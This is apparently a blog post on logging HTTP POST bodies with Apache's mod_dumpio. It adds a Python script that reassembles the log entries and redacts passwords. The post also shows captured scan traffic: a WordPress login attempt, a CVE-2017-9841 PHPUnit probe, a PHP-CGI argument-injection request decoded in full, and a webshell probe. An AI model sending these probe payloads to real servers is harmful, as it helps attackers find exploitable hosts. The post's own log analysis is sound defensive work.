[Apache] How to log the body of an HTTP POST request

To log the body of an HTTP POST request in Apache, enable the Apache module called dumpio. (The official documentation recommends enabling it only while debugging, because of the overhead.)
I mostly followed this site.

Enable the dumpio module and add the following to the VirtualHost section of the Apache config file.


# configuration to dump HTTP POST body to error.log
# ref: https://www.simplified.guide/apache/log-post
# ref: https://httpd.apache.org/docs/2.4/mod/mod_dumpio.html
DumpIOInput On
DumpIOOutput On
LogLevel dumpio:trace7

Note: which config file to edit depends on the environment. I added it to the config file under /etc/apache2/sites-enabled/.

Once the edit is done, restart Apache. From then on the POST body is written to error.log.

A few days later I looked through the logs.

The usual login attempt against the WordPress admin screen:

207.244.xxx.xxx - - [18/Nov/2020:16:18:49 +0000] "POST /wp-login.php HTTP/1.1" 200 2470 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"

[Wed Nov 18 16:18:49.182699 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(103): [client 207.244.xxx.xxx:35438] mod_dumpio:  dumpio_in (data-HEAP): POST /wp-login.php HTTP/1.1\r\n
[Wed Nov 18 16:18:49.182706 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(140): [client 207.244.xxx.xxx:35438] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 16:18:49.182710 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(63): [client 207.244.xxx.xxx:35438] mod_dumpio:  dumpio_in (data-HEAP): 21 bytes
[Wed Nov 18 16:18:49.182713 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(103): [client 207.244.xxx.xxx:35438] mod_dumpio:  dumpio_in (data-HEAP): Host: mymanfile.com\r\n
[Wed Nov 18 16:18:49.182716 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(140): [client 207.244.xxx.xxx:35438] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 16:18:49.182719 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(63): [client 207.244.xxx.xxx:35438] mod_dumpio:  dumpio_in (data-HEAP): 90 bytes
[Wed Nov 18 16:18:49.182721 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(103): [client 207.244.xxx.xxx:35438] mod_dumpio:  dumpio_in (data-HEAP): User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\r\n
[Wed Nov 18 16:18:49.182726 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(140): [client 207.244.xxx.xxx:35438] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 16:18:49.182729 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(63): [client 207.244.xxx.xxx:35438] mod_dumpio:  dumpio_in (data-HEAP): 20 bytes
[Wed Nov 18 16:18:49.182731 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(103): [client 207.244.xxx.xxx:35438] mod_dumpio:  dumpio_in (data-HEAP): Content-Length: 92\r\n
[Wed Nov 18 16:18:49.182734 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(140): [client 207.244.xxx.xxx:35438] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 16:18:49.182737 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(63): [client 207.244.xxx.xxx:35438] mod_dumpio:  dumpio_in (data-HEAP): 49 bytes
[Wed Nov 18 16:18:49.182739 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(103): [client 207.244.xxx.xxx:35438] mod_dumpio:  dumpio_in (data-HEAP): Content-Type: application/x-www-form-urlencoded\r\n
[Wed Nov 18 16:18:49.182742 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(140): [client 207.244.xxx.xxx:35438] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 16:18:49.182745 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(63): [client 207.244.xxx.xxx:35438] mod_dumpio:  dumpio_in (data-HEAP): 47 bytes
[Wed Nov 18 16:18:49.182748 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(103): [client 207.244.xxx.xxx:35438] mod_dumpio:  dumpio_in (data-HEAP): Cookie: wordpress_test_cookie=WP+Cookie+check\r\n
[Wed Nov 18 16:18:49.182750 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(140): [client 207.244.xxx.xxx:35438] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 16:18:49.182753 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(63): [client 207.244.xxx.xxx:35438] mod_dumpio:  dumpio_in (data-HEAP): 23 bytes
[Wed Nov 18 16:18:49.182756 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(103): [client 207.244.xxx.xxx:35438] mod_dumpio:  dumpio_in (data-HEAP): Accept-Encoding: gzip\r\n
[Wed Nov 18 16:18:49.182758 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(140): [client 207.244.xxx.xxx:35438] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 16:18:49.182761 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(63): [client 207.244.xxx.xxx:35438] mod_dumpio:  dumpio_in (data-HEAP): 19 bytes
[Wed Nov 18 16:18:49.182764 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(103): [client 207.244.xxx.xxx:35438] mod_dumpio:  dumpio_in (data-HEAP): Connection: close\r\n
[Wed Nov 18 16:18:49.182781 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(140): [client 207.244.xxx.xxx:35438] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 16:18:49.182783 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(63): [client 207.244.xxx.xxx:35438] mod_dumpio:  dumpio_in (data-HEAP): 2 bytes
[Wed Nov 18 16:18:49.182786 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(103): [client 207.244.xxx.xxx:35438] mod_dumpio:  dumpio_in (data-HEAP): \r\n
[Wed Nov 18 16:18:49.182924 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(140): [client 207.244.xxx.xxx:35438] mod_dumpio: dumpio_in [readbytes-blocking] 92 readbytes
[Wed Nov 18 16:18:49.182930 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(63): [client 207.244.xxx.xxx:35438] mod_dumpio:  dumpio_in (data-HEAP): 92 bytes
[Wed Nov 18 16:18:49.182933 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(103): [client 207.244.xxx.xxx:35438] mod_dumpio:  dumpio_in (data-HEAP): log=hoge&pwd=blah&wp-submit=Log In&redirect_to=https://mymanfile.com/wp-admin/&testcookie=1
[Wed Nov 18 16:18:49.203079 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(164): [client 207.244.xxx.xxx:35438] mod_dumpio: dumpio_out
[Wed Nov 18 16:18:49.203106 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(63): [client 207.244.xxx.xxx:35438] mod_dumpio:  dumpio_out (data-HEAP): 381 bytes
[Wed Nov 18 16:18:49.203111 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(103): [client 207.244.xxx.xxx:35438] mod_dumpio:  dumpio_out (data-HEAP): HTTP/1.1 200 OK\r\nDate: Wed, 18 Nov 2020 16:18:49 GMT\r\nServer: Apache\r\nExpires: Wed, 11 Jan 1984 05:00:00 GMT\r\nCache-Control: no-cache, must-revalidate, max-age=0\r\nSet-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/\r\nX-Frame-Options: SAMEORIGIN\r\nVary: Accept-Encoding\r\nContent-Encoding: gzip\r\nContent-Length: 2089\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n
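
dumpio spreads one request over dozens of trace7 entries, as in the excerpt above, and entries from different worker processes can interleave in error.log. The following Python script is an added example, not code from the original post or from the Apache project: it groups entries by pid and client, rebuilds the request line, headers and body, and masks password-like form fields before the result is copied anywhere else. The sample lines, the 203.0.113.7 and 198.51.100.9 addresses, example.test and the list of secret field names are constructed assumptions.

```python
import re
from itertools import chain

# "[time] [dumpio:trace7] [pid N] mod_dumpio.c(L): [client IP:PORT] mod_dumpio: <msg>"
ENTRY = re.compile(
    r"\[dumpio:trace\d\] \[pid (?P<pid>\d+)\] .*?"
    r"\[client (?P<client>[^\]]+)\] mod_dumpio:\s+(?P<msg>.*)$"
)
MODE = re.compile(r"dumpio_in \[(?P<mode>[a-z]+)-[^\]]*\] \d+ readbytes$")
DATA = re.compile(r"dumpio_in \(data-[^)]*\): (?P<data>.*)$")
COUNT = re.compile(r"\d+ bytes")
# Assumption: field names treated as secrets; adjust for the applications you host.
SECRET = re.compile(r"(^|&)(pwd|pass|passwd|password)=[^&]*", re.I)
CRLF = r"\r\n"  # the error log writes CR LF as these four literal characters


def _new_state():
    return {"mode": "getline", "counted": False, "request": None,
            "headers": {}, "body": ""}


def _finish(key, st):
    return {"pid": key[0], "client": key[1], "request": st["request"],
            "headers": st["headers"],
            "body": SECRET.sub(r"\1\2=<redacted>", st["body"])}


def reassemble(lines):
    """Return one dict per request found in an iterable of error.log lines."""
    open_reqs, done = {}, []
    for line in lines:
        m = ENTRY.search(line)
        if not m:
            continue  # access-log lines and entries from other modules
        key, msg = (m.group("pid"), m.group("client")), m.group("msg")
        st = open_reqs.setdefault(key, _new_state())
        if msg.startswith("dumpio_out"):
            # The first response output closes the request being collected.
            if st["request"] is not None:
                done.append(_finish(key, st))
            del open_reqs[key]
            continue
        mode = MODE.match(msg)
        if mode:  # getline = request line/headers, readbytes = body
            st["mode"], st["counted"] = mode.group("mode"), False
            continue
        d = DATA.match(msg)
        if not d:
            continue
        data = d.group("data")
        if not st["counted"] and COUNT.fullmatch(data):
            st["counted"] = True  # "<n> bytes" announces the data entry that follows
            continue
        st["counted"] = False
        if st["mode"] == "readbytes":
            st["body"] += data  # a large body may arrive as several data entries
            continue
        text = data[:-len(CRLF)] if data.endswith(CRLF) else data
        if st["request"] is None:
            st["request"] = text
        elif text:  # an empty line only marks the end of the headers
            name, _, value = text.partition(":")
            st["headers"][name.strip().lower()] = value.strip()
    return done


def _sample_request(pid, client, request_line, headers, body):
    """Constructed entries in the layout of the excerpt above (not real traffic)."""
    pre = (f"[Wed Nov 18 16:18:49.182699 2020] [dumpio:trace7] [pid {pid}] "
           f"mod_dumpio.c(0): [client {client}] mod_dumpio: ")
    out = [pre + f" dumpio_in (data-HEAP): {request_line}" + CRLF]
    for h in headers + [""]:
        out.append(pre + "dumpio_in [getline-blocking] 0 readbytes")
        out.append(pre + f" dumpio_in (data-HEAP): {len(h) + 2} bytes")
        out.append(pre + f" dumpio_in (data-HEAP): {h}" + CRLF)
    out.append(pre + f"dumpio_in [readbytes-blocking] {len(body)} readbytes")
    out.append(pre + f" dumpio_in (data-HEAP): {len(body)} bytes")
    out.append(pre + f" dumpio_in (data-HEAP): {body}")
    out.append(pre + "dumpio_out")
    return out


FORM = "Content-Type: application/x-www-form-urlencoded"
LOGIN_BODY = "log=hoge&pwd=blah&testcookie=1"
PROBE_BODY = "h=die(@md5(S3pt3mb3r));"
_A = _sample_request("11073", "203.0.113.7:35438", "POST /wp-login.php HTTP/1.1",
                     ["Host: example.test", f"Content-Length: {len(LOGIN_BODY)}", FORM],
                     LOGIN_BODY)
_B = _sample_request("21918", "198.51.100.9:45533", "POST /wuwu11.php HTTP/1.1",
                     ["Host: example.test", f"Content-Length: {len(PROBE_BODY)}", FORM],
                     PROBE_BODY)
# Interleave the two workers' entries and add one unrelated error-log line.
SAMPLE = list(chain.from_iterable(zip(_A, _B)))
SAMPLE.insert(20, "[Fri Nov 20 01:46:12.877361 2020] [php7:error] [pid 21918] "
                  "[client 198.51.100.9:45533] script not found or unable to stat")

if __name__ == "__main__":
    for req in reassemble(SAMPLE):
        print(req["client"], req["request"], "->", req["body"])
```

Pass an open error.log file object to `reassemble` in place of `SAMPLE` to triage real entries.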

Scan traffic checking whether the CVE-2017-9841 vulnerability is present. It tries to execute PHP's md5 function:


91.241.xxx.xxx - - [18/Nov/2020:19:11:10 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 360 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"

[Wed Nov 18 19:11:10.925471 2020] [dumpio:trace7] [pid 11080] mod_dumpio.c(103): [client 91.241.xxx.xxx:53256] mod_dumpio:  dumpio_in (data-HEAP): POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\r\n
[Wed Nov 18 19:11:10.925479 2020] [dumpio:trace7] [pid 11080] mod_dumpio.c(140): [client 91.241.xxx.xxx:53256] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 19:11:10.925483 2020] [dumpio:trace7] [pid 11080] mod_dumpio.c(63): [client 91.241.xxx.xxx:53256] mod_dumpio:  dumpio_in (data-HEAP): 26 bytes
[Wed Nov 18 19:11:10.925486 2020] [dumpio:trace7] [pid 11080] mod_dumpio.c(103): [client 91.241.xxx.xxx:53256] mod_dumpio:  dumpio_in (data-HEAP): Host: 128.199.180.221:80\r\n
[Wed Nov 18 19:11:10.925490 2020] [dumpio:trace7] [pid 11080] mod_dumpio.c(140): [client 91.241.xxx.xxx:53256] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 19:11:10.925493 2020] [dumpio:trace7] [pid 11080] mod_dumpio.c(63): [client 91.241.xxx.xxx:53256] mod_dumpio:  dumpio_in (data-HEAP): 129 bytes
[Wed Nov 18 19:11:10.925496 2020] [dumpio:trace7] [pid 11080] mod_dumpio.c(103): [client 91.241.xxx.xxx:53256] mod_dumpio:  dumpio_in (data-HEAP): User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36\r\n
[Wed Nov 18 19:11:10.925501 2020] [dumpio:trace7] [pid 11080] mod_dumpio.c(140): [client 91.241.xxx.xxx:53256] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 19:11:10.925519 2020] [dumpio:trace7] [pid 11080] mod_dumpio.c(63): [client 91.241.xxx.xxx:53256] mod_dumpio:  dumpio_in (data-HEAP): 20 bytes
[Wed Nov 18 19:11:10.925521 2020] [dumpio:trace7] [pid 11080] mod_dumpio.c(103): [client 91.241.xxx.xxx:53256] mod_dumpio:  dumpio_in (data-HEAP): Content-Length: 19\r\n
[Wed Nov 18 19:11:10.925525 2020] [dumpio:trace7] [pid 11080] mod_dumpio.c(140): [client 91.241.xxx.xxx:53256] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 19:11:10.925527 2020] [dumpio:trace7] [pid 11080] mod_dumpio.c(63): [client 91.241.xxx.xxx:53256] mod_dumpio:  dumpio_in (data-HEAP): 49 bytes
[Wed Nov 18 19:11:10.925530 2020] [dumpio:trace7] [pid 11080] mod_dumpio.c(103): [client 91.241.xxx.xxx:53256] mod_dumpio:  dumpio_in (data-HEAP): Content-Type: application/x-www-form-urlencoded\r\n
[Wed Nov 18 19:11:10.925533 2020] [dumpio:trace7] [pid 11080] mod_dumpio.c(140): [client 91.241.xxx.xxx:53256] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 19:11:10.925536 2020] [dumpio:trace7] [pid 11080] mod_dumpio.c(63): [client 91.241.xxx.xxx:53256] mod_dumpio:  dumpio_in (data-HEAP): 23 bytes
[Wed Nov 18 19:11:10.925538 2020] [dumpio:trace7] [pid 11080] mod_dumpio.c(103): [client 91.241.xxx.xxx:53256] mod_dumpio:  dumpio_in (data-HEAP): Accept-Encoding: gzip\r\n
[Wed Nov 18 19:11:10.925541 2020] [dumpio:trace7] [pid 11080] mod_dumpio.c(140): [client 91.241.xxx.xxx:53256] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 19:11:10.925544 2020] [dumpio:trace7] [pid 11080] mod_dumpio.c(63): [client 91.241.xxx.xxx:53256] mod_dumpio:  dumpio_in (data-HEAP): 19 bytes
[Wed Nov 18 19:11:10.925547 2020] [dumpio:trace7] [pid 11080] mod_dumpio.c(103): [client 91.241.xxx.xxx:53256] mod_dumpio:  dumpio_in (data-HEAP): Connection: close\r\n
[Wed Nov 18 19:11:10.925550 2020] [dumpio:trace7] [pid 11080] mod_dumpio.c(140): [client 91.241.xxx.xxx:53256] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 19:11:10.925552 2020] [dumpio:trace7] [pid 11080] mod_dumpio.c(63): [client 91.241.xxx.xxx:53256] mod_dumpio:  dumpio_in (data-HEAP): 2 bytes
[Wed Nov 18 19:11:10.925555 2020] [dumpio:trace7] [pid 11080] mod_dumpio.c(103): [client 91.241.xxx.xxx:53256] mod_dumpio:  dumpio_in (data-HEAP): \r\n
[Wed Nov 18 19:11:10.925664 2020] [dumpio:trace7] [pid 11080] mod_dumpio.c(140): [client 91.241.xxx.xxx:53256] mod_dumpio: dumpio_in [readbytes-blocking] 19 readbytes
[Wed Nov 18 19:11:10.925669 2020] [dumpio:trace7] [pid 11080] mod_dumpio.c(63): [client 91.241.xxx.xxx:53256] mod_dumpio:  dumpio_in (data-HEAP): 19 bytes
[Wed Nov 18 19:11:10.925672 2020] [dumpio:trace7] [pid 11080] mod_dumpio.c(103): [client 91.241.xxx.xxx:53256] mod_dumpio:  dumpio_in (data-HEAP): <?=md5("phpunit")?>
[Wed Nov 18 19:11:10.925686 2020] [dumpio:trace7] [pid 11080] mod_dumpio.c(164): [client 91.241.xxx.xxx:53256] mod_dumpio: dumpio_out
[Wed Nov 18 19:11:10.925689 2020] [dumpio:trace7] [pid 11080] mod_dumpio.c(63): [client 91.241.xxx.xxx:53256] mod_dumpio:  dumpio_out (data-HEAP): 164 bytes
[Wed Nov 18 19:11:10.925692 2020] [dumpio:trace7] [pid 11080] mod_dumpio.c(103): [client 91.241.xxx.xxx:53256] mod_dumpio:  dumpio_out (data-HEAP): HTTP/1.1 404 Not Found\r\nDate: Wed, 18 Nov 2020 19:11:10 GMT\r\nServer: Apache\r\nContent-Length: 196\r\nConnection: close\r\nContent-Type: text/html; charset=iso-8859-1\r\n\r\n

A remote code execution attempt against the CGI version of PHP. It tries to execute PHP's die and md5 functions:


132.232.xxx.xxx - - [20/Nov/2020:01:41:20 +0000] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 396 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"

URL decodes to

POST /cgi-bin/php?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=""+-d+open_basedir=none+-d+auto_prepend_file=php://input+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env=0+-n

[Fri Nov 20 01:41:20.026271 2020] [dumpio:trace7] [pid 21924] mod_dumpio.c(140): [client 132.232.xxx.xxx:6786] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Fri Nov 20 01:41:20.026275 2020] [dumpio:trace7] [pid 21924] mod_dumpio.c(63): [client 132.232.xxx.xxx:6786] mod_dumpio:  dumpio_in (data-HEAP): 49 bytes
[Fri Nov 20 01:41:20.026278 2020] [dumpio:trace7] [pid 21924] mod_dumpio.c(103): [client 132.232.xxx.xxx:6786] mod_dumpio:  dumpio_in (data-HEAP): Content-Type: application/x-www-form-urlencoded\r\n
[Fri Nov 20 01:41:20.026282 2020] [dumpio:trace7] [pid 21924] mod_dumpio.c(140): [client 132.232.xxx.xxx:6786] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Fri Nov 20 01:41:20.026285 2020] [dumpio:trace7] [pid 21924] mod_dumpio.c(63): [client 132.232.xxx.xxx:6786] mod_dumpio:  dumpio_in (data-HEAP): 82 bytes
[Fri Nov 20 01:41:20.026288 2020] [dumpio:trace7] [pid 21924] mod_dumpio.c(103): [client 132.232.xxx.xxx:6786] mod_dumpio:  dumpio_in (data-HEAP): User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\n
[Fri Nov 20 01:41:20.026292 2020] [dumpio:trace7] [pid 21924] mod_dumpio.c(140): [client 132.232.xxx.xxx:6786] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Fri Nov 20 01:41:20.026295 2020] [dumpio:trace7] [pid 21924] mod_dumpio.c(63): [client 132.232.xxx.xxx:6786] mod_dumpio:  dumpio_in (data-HEAP): 23 bytes
[Fri Nov 20 01:41:20.026297 2020] [dumpio:trace7] [pid 21924] mod_dumpio.c(103): [client 132.232.xxx.xxx:6786] mod_dumpio:  dumpio_in (data-HEAP): Host: 128.199.180.221\r\n
[Fri Nov 20 01:41:20.026301 2020] [dumpio:trace7] [pid 21924] mod_dumpio.c(140): [client 132.232.xxx.xxx:6786] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Fri Nov 20 01:41:20.026303 2020] [dumpio:trace7] [pid 21924] mod_dumpio.c(63): [client 132.232.xxx.xxx:6786] mod_dumpio:  dumpio_in (data-HEAP): 20 bytes
[Fri Nov 20 01:41:20.026306 2020] [dumpio:trace7] [pid 21924] mod_dumpio.c(103): [client 132.232.xxx.xxx:6786] mod_dumpio:  dumpio_in (data-HEAP): Content-Length: 28\r\n
[Fri Nov 20 01:41:20.026326 2020] [dumpio:trace7] [pid 21924] mod_dumpio.c(140): [client 132.232.xxx.xxx:6786] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Fri Nov 20 01:41:20.026330 2020] [dumpio:trace7] [pid 21924] mod_dumpio.c(63): [client 132.232.xxx.xxx:6786] mod_dumpio:  dumpio_in (data-HEAP): 24 bytes
[Fri Nov 20 01:41:20.026332 2020] [dumpio:trace7] [pid 21924] mod_dumpio.c(103): [client 132.232.xxx.xxx:6786] mod_dumpio:  dumpio_in (data-HEAP): Connection: Keep-Alive\r\n
[Fri Nov 20 01:41:20.026335 2020] [dumpio:trace7] [pid 21924] mod_dumpio.c(140): [client 132.232.xxx.xxx:6786] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Fri Nov 20 01:41:20.026338 2020] [dumpio:trace7] [pid 21924] mod_dumpio.c(63): [client 132.232.xxx.xxx:6786] mod_dumpio:  dumpio_in (data-HEAP): 25 bytes
[Fri Nov 20 01:41:20.026341 2020] [dumpio:trace7] [pid 21924] mod_dumpio.c(103): [client 132.232.xxx.xxx:6786] mod_dumpio:  dumpio_in (data-HEAP): Cache-Control: no-cache\r\n
[Fri Nov 20 01:41:20.026344 2020] [dumpio:trace7] [pid 21924] mod_dumpio.c(140): [client 132.232.xxx.xxx:6786] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Fri Nov 20 01:41:20.026347 2020] [dumpio:trace7] [pid 21924] mod_dumpio.c(63): [client 132.232.xxx.xxx:6786] mod_dumpio:  dumpio_in (data-HEAP): 2 bytes
[Fri Nov 20 01:41:20.026349 2020] [dumpio:trace7] [pid 21924] mod_dumpio.c(103): [client 132.232.xxx.xxx:6786] mod_dumpio:  dumpio_in (data-HEAP): \r\n
[Fri Nov 20 01:41:20.026464 2020] [dumpio:trace7] [pid 21924] mod_dumpio.c(140): [client 132.232.xxx.xxx:6786] mod_dumpio: dumpio_in [readbytes-blocking] 28 readbytes
[Fri Nov 20 01:41:20.026474 2020] [dumpio:trace7] [pid 21924] mod_dumpio.c(63): [client 132.232.xxx.xxx:6786] mod_dumpio:  dumpio_in (data-HEAP): 28 bytes
[Fri Nov 20 01:41:20.026479 2020] [dumpio:trace7] [pid 21924] mod_dumpio.c(103): [client 132.232.xxx.xxx:6786] mod_dumpio:  dumpio_in (data-HEAP): <?php die(@md5(PHP-CGI)); ?>
[Fri Nov 20 01:41:20.026500 2020] [dumpio:trace7] [pid 21924] mod_dumpio.c(164): [client 132.232.xxx.xxx:6786] mod_dumpio: dumpio_out
[Fri Nov 20 01:41:20.026505 2020] [dumpio:trace7] [pid 21924] mod_dumpio.c(63): [client 132.232.xxx.xxx:6786] mod_dumpio:  dumpio_out (data-HEAP): 200 bytes
[Fri Nov 20 01:41:20.026509 2020] [dumpio:trace7] [pid 21924] mod_dumpio.c(103): [client 132.232.xxx.xxx:6786] mod_dumpio:  dumpio_out (data-HEAP): HTTP/1.1 404 Not Found\r\nDate: Fri, 20 Nov 2020 01:41:20 GMT\r\nServer: Apache\r\nContent-Length: 196\r\nKeep-Alive: timeout=5, max=92\r\nConnection: Keep-Alive\r\nContent-Type: text/html; charset=iso-8859-1\r\n\r\n

Scan traffic checking whether a webshell is present. It tries to execute PHP's die and md5 functions through the webshell:


132.232.xxx.xxx - - [20/Nov/2020:01:46:12 +0000] "POST /wuwu11.php HTTP/1.1" 404 396 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"

[Fri Nov 20 01:46:12.877094 2020] [dumpio:trace7] [pid 21918] mod_dumpio.c(103): [client 132.232.xxx.xxx:45533] mod_dumpio:  dumpio_in (data-HEAP): OST /wuwu11.php HTTP/1.1\r\n
[Fri Nov 20 01:46:12.877107 2020] [dumpio:trace7] [pid 21918] mod_dumpio.c(140): [client 132.232.xxx.xxx:45533] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Fri Nov 20 01:46:12.877113 2020] [dumpio:trace7] [pid 21918] mod_dumpio.c(63): [client 132.232.xxx.xxx:45533] mod_dumpio:  dumpio_in (data-HEAP): 49 bytes
[Fri Nov 20 01:46:12.877118 2020] [dumpio:trace7] [pid 21918] mod_dumpio.c(103): [client 132.232.xxx.xxx:45533] mod_dumpio:  dumpio_in (data-HEAP): Content-Type: application/x-www-form-urlencoded\r\n
[Fri Nov 20 01:46:12.877123 2020] [dumpio:trace7] [pid 21918] mod_dumpio.c(140): [client 132.232.xxx.xxx:45533] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Fri Nov 20 01:46:12.877128 2020] [dumpio:trace7] [pid 21918] mod_dumpio.c(63): [client 132.232.xxx.xxx:45533] mod_dumpio:  dumpio_in (data-HEAP): 90 bytes
[Fri Nov 20 01:46:12.877132 2020] [dumpio:trace7] [pid 21918] mod_dumpio.c(103): [client 132.232.xxx.xxx:45533] mod_dumpio:  dumpio_in (data-HEAP): User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0\r\n
[Fri Nov 20 01:46:12.877138 2020] [dumpio:trace7] [pid 21918] mod_dumpio.c(140): [client 132.232.xxx.xxx:45533] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Fri Nov 20 01:46:12.877143 2020] [dumpio:trace7] [pid 21918] mod_dumpio.c(63): [client 132.232.xxx.xxx:45533] mod_dumpio:  dumpio_in (data-HEAP): 23 bytes
[Fri Nov 20 01:46:12.877147 2020] [dumpio:trace7] [pid 21918] mod_dumpio.c(103): [client 132.232.xxx.xxx:45533] mod_dumpio:  dumpio_in (data-HEAP): Host: 128.199.180.221\r\n
[Fri Nov 20 01:46:12.877152 2020] [dumpio:trace7] [pid 21918] mod_dumpio.c(140): [client 132.232.xxx.xxx:45533] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Fri Nov 20 01:46:12.877156 2020] [dumpio:trace7] [pid 21918] mod_dumpio.c(63): [client 132.232.xxx.xxx:45533] mod_dumpio:  dumpio_in (data-HEAP): 20 bytes
[Fri Nov 20 01:46:12.877160 2020] [dumpio:trace7] [pid 21918] mod_dumpio.c(103): [client 132.232.xxx.xxx:45533] mod_dumpio:  dumpio_in (data-HEAP): Content-Length: 23\r\n
[Fri Nov 20 01:46:12.877165 2020] [dumpio:trace7] [pid 21918] mod_dumpio.c(140): [client 132.232.xxx.xxx:45533] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Fri Nov 20 01:46:12.877170 2020] [dumpio:trace7] [pid 21918] mod_dumpio.c(63): [client 132.232.xxx.xxx:45533] mod_dumpio:  dumpio_in (data-HEAP): 24 bytes
[Fri Nov 20 01:46:12.877174 2020] [dumpio:trace7] [pid 21918] mod_dumpio.c(103): [client 132.232.xxx.xxx:45533] mod_dumpio:  dumpio_in (data-HEAP): Connection: Keep-Alive\r\n
[Fri Nov 20 01:46:12.877179 2020] [dumpio:trace7] [pid 21918] mod_dumpio.c(140): [client 132.232.xxx.xxx:45533] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Fri Nov 20 01:46:12.877183 2020] [dumpio:trace7] [pid 21918] mod_dumpio.c(63): [client 132.232.xxx.xxx:45533] mod_dumpio:  dumpio_in (data-HEAP): 25 bytes
